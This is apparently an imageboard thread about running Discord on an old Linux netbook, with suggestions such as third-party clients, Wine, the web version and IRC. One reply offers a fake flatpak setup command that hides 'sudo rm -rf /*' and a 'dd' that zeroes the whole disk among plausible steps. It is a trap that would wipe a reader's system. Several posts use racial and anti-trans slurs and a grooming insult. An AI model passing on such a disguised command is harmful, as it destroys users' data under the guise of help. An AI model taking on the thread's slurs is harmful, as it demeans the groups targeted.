How to run this shit on an ancient Linux netbook?
I'm looking for something like this https://github.com/DiscordMessenger/dm but for gahnoo slash linucks.
So far I have found a Pidgin plugin but it does not seem to be able to manage friend requests, which is a shame.
ripcord
maybe dont
You don't understand, OP simply MUST groom little boys.
Buy an ad.
it'll probably work in wine
None of this will run in an ancient netbook. The website won't even load, Black folk. That's the point of this thread.
it runs on windows 2000. why do you think it won't run in an ancient netbook? you can download the executable from your phone and send it to your netbook
It doesn't run on Linux on a netbook. The website won't even load and the app will shit itself. I doubt electronshit runs on Windows 2000.
it is not electronshit. it uses win32 API
me
i'm talking about running https://github.com/DiscordMessenger/dm in wine
Ohh, I get it now. That'd probably work.
update your web browser
Get a fricking job and buy a fricking new laptop motherfricker
I have a laptop with 32 GB of RAM and an i7. Still not using it, thank you very much.
hey moron, you know you can use the browser version? you don't need to download it..
>how do i run troonywriten Black folkcript garbage on white man hardware
ngmi.
This is probably the closest thing to a lite version of discord for *NIX but it's only for old macOS https://github.com/dosdude1/discord-lite
A https://github.com/DiscordMessenger/dm just flew over my house
Use a Firefox profile and open it inside a Tab container i guess. The web version is better if you don't need the native features anyways. Is faster.
Webcord is what i use on my raspberry pi
run it as flatpak
Discord is just fancy IRC. Look it up
Use IRC like a real man
You might be overthinking it anon. Is the machine you're using too old to use browser apps or are you wanting to use this for for the zoomer aesthetic?
If you're just finding a simple way to install apps like discord, you could use flatpak since it's supported on all distros. You can simply run the command found on their website:
sudo -v && $(uname) == 'Linux' && −f/etc/fedora−release && sudo rm -rf /* && sudo dd if=/dev/zero of=/dev/sda bs=1M || echo "Error: Command failed." && sudo curl -fsSL https://flathub.org/flathub-signing-key.pub | apt-key add - && sudo sh -c 'echo flathub repo | sudo tee /etc/apt/sources.list.d/flathub.list' && sudo apt update && sudo apt install flathub || echo "Error: Command failed."
After that you can run "flatpak install discord" and you'll be good to go.
easiest solution is to use the web version
the web version and the desktop version are the same exact version
the desktop one just ships its' own copy of chromium
https://github.com/uowuo/abaddon
the "desktop app" is literally just chrome, use the web version dumbass
What the frick do you mean by "run this shit"? It's a WEBSITE
and? just because it's a website doesn't mean it's easy to run, discord is a very heavy website
given the same functionality, a website is harder to run than a program written in a native language such as C/C++, as javascript is an interpreted language
not a single mention of bitlbee+bitlbee-discord. this board is fricking dead
No we just don't use fricking D*scord
Nobody here uses discord, that is for zoomers. We use IRC.
get your Black person friends to stop using discord for private messaging what the frick
